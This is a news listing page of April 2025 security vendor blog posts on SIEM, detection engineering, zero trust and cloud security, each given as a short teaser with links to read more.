%term

The latest News and Information on Security Incident and Event Management.

Your Network Evidence, Your SIEM, your way: Corelight's open SIEM strategy empowers SOCs with a unified experience

Apr 25, 2025 By Ricky Lin In Corelight

Security operations centers (SOCs) are under constant pressure to keep their organizations secure, while battling alert fatigue, tool sprawl, and ever-rising demands for speed and precision. Analysts today face an overwhelming landscape where context is thin, telemetry is inconsistent, and critical signals are buried in noise. At Corelight, we’re focused on one simple idea: Your network evidence should work wherever your SOC team does.

Read Post

Corelight

Read more about Your Network Evidence, Your SIEM, your way: Corelight's open SIEM strategy empowers SOCs with a unified experience

Elastic Security Labs provides an under-the-hood look at its detection engineering processes

Apr 24, 2025 By Isai Anthony, In Elastic

The 2025 State of Detection Engineering at Elastic explores how we create, maintain, and assess our SIEM and EDR rulesets. Today, Elastic Security Labs is releasing the 2025 State of Detection Engineering at Elastic! This brand new report is the first of its kind — we’re pulling back the curtain on our Detection Engineering practices, going beyond the traditional survey-style State of Detection Engineering report.

Read Post

Elastic

Read more about Elastic Security Labs provides an under-the-hood look at its detection engineering processes

Zero trust for public sector organizations

Apr 24, 2025 By Elastic In Elastic

The “never trust, always verify” premise of Zero Trust requires a significant shift in how agencies evaluate security risks. Every transaction demands a risk assessment across every Zero Trust pillar — a tough task when the key data is locked in different systems and tools. But a unified data platform can essentially serve as the glue that connects all your systems, making them more integrated, accurate, and trustable.

View Video

Elastic

Read more about Zero trust for public sector organizations

Exabeam Research Uncovers AI Disconnect Between Security Leaders and Practitioners

Apr 22, 2025 By Exabeam In Exabeam

71% of executives report AI-driven productivity gains; only 22% of analysts agree.

Read Post

Exabeam

Read more about Exabeam Research Uncovers AI Disconnect Between Security Leaders and Practitioners

Less noise, more signal: How Elastic Defend slashed event volume

Apr 22, 2025 By Daniel Ferullo In Elastic

When an EDR tool generates too much endpoint telemetry, security teams quickly run into problems. Mountains of process events, network connections, and file operations can overwhelm analysts, making it harder to spot real threats in the noise. High data volumes drive up storage costs, slow down searches, and contribute to alert fatigue — leading to longer investigation times and potential blind spots.

Read Post

Elastic

Read more about Less noise, more signal: How Elastic Defend slashed event volume

Understanding AWS Cloud Security

Apr 22, 2025 By Jeff Darrington In Graylog

When Amazon Web Services (AWS) initially launched in 2006, it offered the first compute, storage, and database cloud service that developers could build on. Over time, AWS became a fundamental cloud service provider as organizations started migrating to the cloud. As one of the three primary cloud services providers, AWS remains integral to most businesses.

Read Post

Graylog

Read more about Understanding AWS Cloud Security

Using LimaCharlie as an Observability Pipeline to reduce SIEM storage costs

Apr 18, 2025 By LimaCharlie In LimaCharlie

LimaCharlie's SecOps Cloud Platform (SCP) creates a scalable, versatile, and actionable observability pipeline by collecting and standardizing telemetry from the full security stack. Stream data from any input, route it to any output. The SCP provides visibility into telemetry sources and empowers users to create automated responses to actionable events in the pipeline.

View Video

LimaCharlie

Read more about Using LimaCharlie as an Observability Pipeline to reduce SIEM storage costs

Strengthening cyber resilience with Elastic Security and Observability

Apr 18, 2025 By Ravi Ramnani In Elastic

A guide to aligning with SEBI’s CSCRF using Elastic's integrated security and observability capabilities Financial institutions in India are preparing for a new era of cybersecurity compliance with the Securities and Exchange Board of India’s (SEBI) Cybersecurity and Cyber Resilience Framework (CSCRF).

Read Post

Elastic

Read more about Strengthening cyber resilience with Elastic Security and Observability

Hunting with Elastic Security: Detecting command and scripting interpreter execution

Apr 17, 2025 By Justin Higdon In Elastic

Stealthy adversaries continually exploit system utilities to execute malicious code. A particularly potent and frequently misused tactic is MITRE ATT&CK T1059 - Command and Scripting Interpreter, wherein attackers harness built-in interpreters like PowerShell, Bash, Python, or JavaScript to run arbitrary commands.

Read Post

Elastic

Read more about Hunting with Elastic Security: Detecting command and scripting interpreter execution

Empowering US federal AI initiatives: How Elastic helps agencies comply with M-25-21 and M-25-22

Apr 16, 2025 By Eric Cobb, In Elastic

A practical guide for chief AI officers and technology leaders implementing federal AI governance The US Office of Management and Budget's recent memoranda — M-25-21, "Accelerating Federal Use of AI through Innovation, Governance, and Public Trust," and M-25-22, "Driving Efficient Acquisition of Artificial Intelligence in Government" — establish comprehensive frameworks for federal agencies that implement AI systems while maintaining appropriate safeguards.

Read Post